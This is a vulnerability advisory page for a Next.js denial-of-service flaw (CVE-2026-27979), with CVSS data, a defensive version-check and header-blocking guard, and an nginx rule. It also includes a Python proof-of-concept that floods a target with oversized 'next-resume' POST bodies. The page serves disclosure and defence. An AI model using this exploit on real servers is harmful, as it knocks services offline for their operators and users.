Security Vulnerability Report
CVE-2026-27979 CVSS 7.5 HIGH

Published: 2026-03-18 01:16:05
Last Modified: 2026-03-18 20:04:18

Description

Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, a request containing the `next-resume: 1` header (corresponding with a PPR resume request) would buffer request bodies without consistently enforcing `maxPostponedStateSize` in certain setups. The previous mitigation protected minimal-mode deployments, but equivalent non-minimal deployments remained vulnerable to the same unbounded postponed resume-body buffering behavior. In applications using the App Router with Partial Prerendering capability enabled (via `experimental.ppr` or `cacheComponents`), an attacker could send oversized `next-resume` POST payloads that were buffered without consistent size enforcement in non-minimal deployments, causing excessive memory usage and potential denial of service. This is fixed in version 16.1.7 by enforcing size limits across all postponed-body buffering paths and erroring when limits are exceeded. If upgrading is not immediately possible, block requests containing the `next-resume` header, as this is never valid to be sent from an untrusted client.
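Two practical checks that follow from the description above, as an added example (not code from the advisory, the NVD record or the Next.js project): a version-range test for the affected builds, and a request guard for a Node.js front door (custom server or reverse proxy) that refuses anything carrying `next-resume` before its body is read, which is the interim mitigation the advisory recommends. The handler-wrapper shape, the in-memory request/response stand-ins used by `simulate`, and the decision to count `16.1.7-canary.*` builds as still affected are assumptions of this example.

```javascript
'use strict';
// Added example for CVE-2026-27979 (not code from the advisory or from Next.js):
// (1) a check for the affected version range and (2) a front-door guard that
// refuses any request carrying the `next-resume` header before its body is read.

// Affected range stated in the advisory: >= 16.0.1 and < 16.1.7.
const FIRST_AFFECTED = '16.0.1';
const FIRST_FIXED = '16.1.7';

// Parse "major.minor.patch[-prerelease]"; a leading "v" is tolerated.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(String(v).trim());
  if (!m) throw new Error(`unrecognised version string: ${v}`);
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], prerelease: m[4] !== undefined };
}

// Semver ordering: numeric parts first; a prerelease sorts below its release, so
// 16.1.7-canary.N is still counted as affected. Assumption: the advisory names only
// the stable 16.1.7 as fixed, so canaries are treated conservatively. Two prereleases
// of the same base version are not ordered against each other here.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa.nums[i] !== pb.nums[i]) return pa.nums[i] < pb.nums[i] ? -1 : 1;
  }
  if (pa.prerelease === pb.prerelease) return 0;
  return pa.prerelease ? -1 : 1;
}

function isAffectedVersion(version) {
  return compareVersions(version, FIRST_AFFECTED) >= 0 &&
         compareVersions(version, FIRST_FIXED) < 0;
}

// Node lowercases incoming header names, so one lookup covers any casing.
function hasResumeHeader(headers) {
  return Object.prototype.hasOwnProperty.call(headers, 'next-resume');
}

// Wrap an http request handler. A request with `next-resume` is answered 403 and the
// connection is torn down once the response is flushed, so the upload is never
// drained into memory. Browsers never set this header; only Next.js's own resume
// machinery does, so an untrusted client sending it has no legitimate purpose.
function withResumeGuard(handler) {
  return function guarded(req, res) {
    if (hasResumeHeader(req.headers)) {
      res.writeHead(403, { 'Content-Type': 'text/plain', Connection: 'close' });
      res.end('forbidden\n', () => req.destroy());
      return 'blocked';
    }
    return handler(req, res);
  };
}

// Run the guard against constructed in-memory request/response stand-ins (no sockets)
// and report what happened. A real deployment would do
//   http.createServer(withResumeGuard(app)).listen(3000)
function simulate(headers) {
  const req = { headers, destroyed: false, destroy() { this.destroyed = true; } };
  const res = {
    status: 0,
    writeHead(status) { this.status = status; },
    end(_body, cb) { if (cb) cb(); },
  };
  const app = (_req, r) => { r.writeHead(200); r.end(); return 'served'; };
  const outcome = withResumeGuard(app)(req, res);
  return { outcome, status: res.status, destroyed: req.destroyed };
}
```

The guard must sit in front of the Next.js process, not inside a route handler: the buffering happens before application code runs, so only a proxy or custom server that answers before consuming the body actually stops the memory growth. At an nginx edge the equivalent rule is `if ($http_next_resume) { return 403; }` in the `server` block. Once on 16.1.7 or later the size limit is enforced by the framework itself, but leaving the block in place costs nothing.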

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE
Next.js >= 16.0.1
Next.js < 16.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-27979 PoC - Next.js PPR Resume Body Buffering DoS

Sends oversized POST requests carrying the `next-resume: 1` header, which
vulnerable Next.js builds (>= 16.0.1, < 16.1.7, App Router with PPR enabled,
non-minimal deployment) buffer without enforcing `maxPostponedStateSize`.

Note: Use only for authorized security testing
"""
import requests
import sys

# Placeholder. The buffering path is the PPR resume path, so point this at a
# route served by an App Router app with `experimental.ppr` or `cacheComponents`
# enabled, not at an arbitrary API route.
TARGET_URL = "http://target-app.com/api/some-endpoint"


def send_malicious_request(url, payload_size_mb=50):
    """
    Send one oversized next-resume request to trigger DoS.
    Returns the Response, or None if the request did not complete.
    """
    headers = {
        "Content-Type": "application/octet-stream",
        "next-resume": "1",  # Trigger PPR resume functionality
    }
    # Generate oversized payload (allocated in full on the client side)
    oversized_payload = b"A" * (payload_size_mb * 1024 * 1024)
    try:
        print(f"[*] Sending malicious request with {payload_size_mb}MB payload...")
        print(f"[*] Target: {url}")
        print("[*] Header: next-resume: 1")
        response = requests.post(
            url,
            headers=headers,
            data=oversized_payload,
            timeout=30,
        )
        # A patched server enforces the size limit and errors out quickly;
        # a vulnerable one keeps reading and buffering the whole body.
        print(f"[*] Response Status: {response.status_code}")
        return response
    except requests.exceptions.Timeout:
        print("[!] Request timeout - potential memory exhaustion")
        return None
    except requests.exceptions.ConnectionError as e:
        # Connection refused / reset is not evidence of the bug; re-raise so
        # an unreachable host is not reported as vulnerable.
        print(f"[!] Connection error (target unreachable?): {e}")
        raise
    except Exception as e:
        print(f"[!] Error: {e}")
        return None


def check_vulnerability(url):
    """
    Check if target is vulnerable by observing memory behavior.
    Heuristic: a request that times out is treated as a sign the server
    is still buffering the oversized body.
    """
    print("[*] Testing for CVE-2026-27979 vulnerability...")
    # Send multiple oversized requests
    for i in range(3):
        print(f"\n[*] Request {i + 1}/3")
        response = send_malicious_request(url, payload_size_mb=100)
        if response is None:
            print("[+] Target appears vulnerable - request failed/timeout")
            return True
    return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    check_vulnerability(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27979", "sourceIdentifier": "[email protected]", "published": "2026-03-18T01:16:04.797", "lastModified": "2026-03-18T20:04:17.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, a request containing the `next-resume: 1` header (corresponding with a PPR resume request) would buffer request bodies without consistently enforcing `maxPostponedStateSize` in certain setups. The previous mitigation protected minimal-mode deployments, but equivalent non-minimal deployments remained vulnerable to the same unbounded postponed resume-body buffering behavior. In applications using the App Router with Partial Prerendering capability enabled (via `experimental.ppr` or `cacheComponents`), an attacker could send oversized `next-resume` POST payloads that were buffered without consistent size enforcement in non-minimal deployments, causing excessive memory usage and potential denial of service. This is fixed in version 16.1.7 by enforcing size limits across all postponed-body buffering paths and erroring when limits are exceeded. If upgrading is not immediately possible, block requests containing the `next-resume` header, as this is never valid to be sent from an untrusted client."}, {"lang": "es", "value": "Next.js es un React framework para construir aplicaciones web full-stack. A partir de la versión 16.0.1 y antes de la versión 16.1.7, una solicitud que contuviera el encabezado `next-resume: 1` (correspondiente a una solicitud de reanudación PPR) almacenaría en búfer los cuerpos de las solicitudes sin aplicar consistentemente `maxPostponedStateSize` en ciertas configuraciones. 
La mitigación anterior protegía las implementaciones en modo mínimo, pero las implementaciones no mínimas equivalentes seguían siendo vulnerables al mismo comportamiento de almacenamiento en búfer ilimitado del cuerpo de reanudación pospuesto. En aplicaciones que utilizan el App Router con la capacidad de Prerrenderizado Parcial habilitada (a través de `experimental.ppr` o `cacheComponents`), un atacante podría enviar cargas útiles POST `next-resume` sobredimensionadas que se almacenaban en búfer sin una aplicación consistente del tamaño en implementaciones no mínimas, causando un uso excesivo de memoria y una potencial denegación de servicio. Esto se corrige en la versión 16.1.7 al aplicar límites de tamaño en todas las rutas de almacenamiento en búfer de cuerpos pospuestos y generar un error cuando se exceden los límites. Si la actualización no es posible de inmediato, bloquee las solicitudes que contengan el encabezado `next-resume`, ya que nunca es válido que esto sea enviado desde un cliente no confiable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": 
"NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], ... (truncated)